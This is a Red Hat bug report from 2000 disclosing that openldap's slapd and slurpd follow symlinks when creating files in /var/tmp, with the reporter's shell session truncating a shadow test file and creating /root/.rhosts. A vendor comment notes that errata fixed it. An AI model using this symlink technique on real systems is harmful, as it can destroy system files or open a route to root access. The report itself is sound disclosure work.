This service will be undergoing maintenance at 00:00 UTC, 2016-09-28. It is expected to last about 1 hours
Bug 10714 - Insecure file creation using static files which follow symlinks.
Insecure file creation using static files which follow symlinks.
Status: CLOSED ERRATA
Product: Red Hat Linux
Classification: Retired
Component: openldap (Show other bugs)
6.2
All Linux
high Severity medium
: ---
: ---
Assigned To: Nalin Dahyabhai
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2000-04-10 20:57 EDT by SB
Modified: 2008-05-01 11:37 EDT (History)
1 user (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2000-04-24 02:41:33 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:


Attachments (Terms of Use)

  None (edit)
Description SB 2000-04-10 20:57:44 EDT
I was trying out the new openldap package(openldap-1.2.9-5) and I noticed
it blindly creates some files which follow symlinks and will overwrite any
file without notification. For example:

[root@king /]# ls -al /etc/shadow.test
-r--------    1 root     root          780 Apr 10 21:02 /etc/shadow.test
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:55 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
[root@king /]# ln -s /etc/shadow.test /var/tmp/NEXTID
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:55 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
lrwxrwxrwx    1 root     root           13 Apr 10 20:55 NEXTID ->
/etc/shadow.test
[root@king /]# /etc/rc.d/init.d/ldap start
Starting ldap: [  OK  ]
[root@king /]# ls -al /etc/shadow.test
-r--------    1 root     root          780 Apr 10 21:02 /etc/shadow.test
[root@king /]# /etc/rc.d/init.d/ldap stop
Shutting down ldap: [  OK  ]
[root@king /]# ls -al /etc/shadow.test
-r--------    1 root     root            2 Apr 10 21:04 /etc/shadow.test
[root@king /]#

Apparently when slapd terminates it creates the file NEXTID in /var/tmp
(actually it follows symlink from /usr/tmp).  It will create and
overwrite files.  slurpd has a similar problem:

[root@king /]# ls -al /root/.rhosts
ls: /root/.rhosts: No such file or directory
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:59 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
[root@king /]# slurpd
No replicas in slapd config file "/etc/openldap/slapd.conf"!
Error: : directory does not exist
Error: /usr/tmp/slurpd.replog: directory does not exist
Error: /usr/tmp/slurpd.status: directory does not exist
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:59 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
-rw-r--r--    1 root     root            0 Apr 10 20:59 slurpd.status
[root@king /]#
[root@king /]# rm /var/tmp/slurpd.status
[root@king /]# ln -s /root/.rhosts /var/tmp/slurpd.status
[root@king /]# slurpd
No replicas in slapd config file "/etc/openldap/slapd.conf"!
Error: : directory does not exist
Error: /usr/tmp/slurpd.replog: directory does not exist
Error: /usr/tmp/slurpd.status: directory does not exist
[root@king /]# ls -al /root/.rhosts
-rw-r--r--    1 root     root            0 Apr 10 21:01 /root/.rhosts
[root@king /]#

slurpd to my knowledge will only create files, it will not overwrite or
truncate previously existing files.  Also after slapd is running if you
type slurpd, it will try to read from /var/tmp/slurpd.status fail and then
write to /var/tmp/slurpd.status.lock which can be a symlink to any file you
wish to create and truncate any existing file to 0 bytes.  There are other
instances I noticed in the code such /tmp/slurpd.dump and other files that
probably behanve the same. Not good.

-Stan Bubrouski
Comment 1 Cristian Gafton 2000-04-24 02:41:59 EDT
Errata released that fixes the problem.

Note You need to log in before you can comment on or make changes to this bug.